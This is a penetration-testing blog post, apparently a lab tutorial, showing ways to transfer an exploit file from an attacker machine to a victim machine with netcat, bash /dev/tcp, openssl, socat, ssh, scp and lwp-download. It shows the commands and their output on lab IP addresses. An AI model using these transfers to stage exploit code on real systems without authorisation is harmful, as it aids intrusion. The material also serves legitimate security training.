Saturday, January 23, 2021

File Download Techniques

netcat download

We start off by starting a listener on the attacking machine with the file we want to transfer. 

Attacker Box:
sam@ubuntu:~$ nc -l -p 8888 > "exploit.tar"
sam@ubuntu:~$

Next we issue the command below to download the file to the victim machine. 

Victim Box:
user@debian:~$ nc 192.168.155.138 8888 < "exp.tar"
user@debian:~$

bash fetch file

We set up a listener with netcat on the attack box listening on port 8888 and with the file we want to transfer. 

Attacker Box:
sam@ubuntu:~$ nc -l -p 8888 < "exploit.c"

Next on the victim box we issue the bash command and write to an output file 'exp.c'. 

Victim Box:
user@debian:~$  bash -c 'cat < /dev/tcp/192.168.155.129/8888 > exp.c'

openssl file download

First we need to create keys on our attacker box to pass to our openssl server. This is accomplished by the command below: 

sam@asus:/tmp% openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Generating a 4096 bit RSA private key
...................++
...........++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
sam@asus:/tmp%
sam@asus:/tmp% ls -l
total 24
-rw-rw-r-- 1 sam  sam    15 Jan 20 20:41 exploit.c
-rw-rw-r-- 1 sam  sam  1919 Jan 20 20:59 cert.pem
-rw-rw-r-- 1 sam  sam  3268 Jan 20 20:59 key.pem
sam@asus:/tmp%

We now have two 'pem' files we can use when we setup the openssl server. Now we can start the openssl server listening on port '8888'. 

Attacker Box:
sam@asus:/tmp% openssl s_server -key key.pem -cert cert.pem -port 8888 < exploit.c
Using default temp DH parameters
ACCEPT

Once we start the server, we move on to the victim box and issue the command to download the file: 

Victim Box:
user@debian:~$ openssl s_client -connect 192.168.155.129:8888 > "exp.c"
depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
verify error:num=18:self signed certificate
verify return:1
depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
verify return:1

read:errno=0
user@debian:~$
user@debian:~$ ls
exp.c
user@debian:~$

socat file download

First we start a socat listener on the attack box for the victim to connect to. 

Attacker Box:
sam@ubuntu:~$ socat -u file:exploit.tar tcp-listen:8888,reuseaddr

On the victim box we issue the following command to download the file locally. 

Victim Box:
user@debian:~$ socat -u tcp-connect:192.168.155.138:8888 open:exp.tar,creat
user@debian:~$ ls
exp.tar
user@debian:~$

ssh file download

Here we can use SSH to download a file to the victim box. 

Victim Box:
user@debian:~$ ssh sam@192.168.155.129 "cat /home/sam/exploit.c" > /tmp/exp.c
sam@192.168.155.129's password: 
user@debian:~$ ls /tmp
exp.c
user@debian:~$

scp file download

We can transfer a file to the victim box with scp. 

Victim Box:
user@debian:~$ scp sam@192.168.155.129:~/exploit.tar exp.tar
sam@192.168.155.129's password: 
exploit.tar                                 100%    0     0.0KB/s   00:00    
user@debian:~$

LWP download

We can use the 'lwp-download' utility which comes default in a Perl installation to download a file to the victim machine. 

Victim Box:
user@debian:~$ lwp-download http://192.168.155.129/~sam/exploit.sh exp.sh
1.66 KB received                                                            
user@debian:~$
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • bWAPP CSRF
    CSRF (Change Password) The first challenge is the change password CSRF. Our goal is to successfully change the users password with out log...
  • DVWA: File Upload
    Our goal is to exploit the weakness in file upload checking and obtain a remote system shell on the host. We start off with the security b...
  • bWAPP XSS Injections
    Cross-site-Scripting - Reflected (GET) Payload: <script>alert(1)</script> Cross-site-Scripting - Reflected (POST) Payload:...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...
  • Exploiting Weak WEBDAV Configurations
    The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...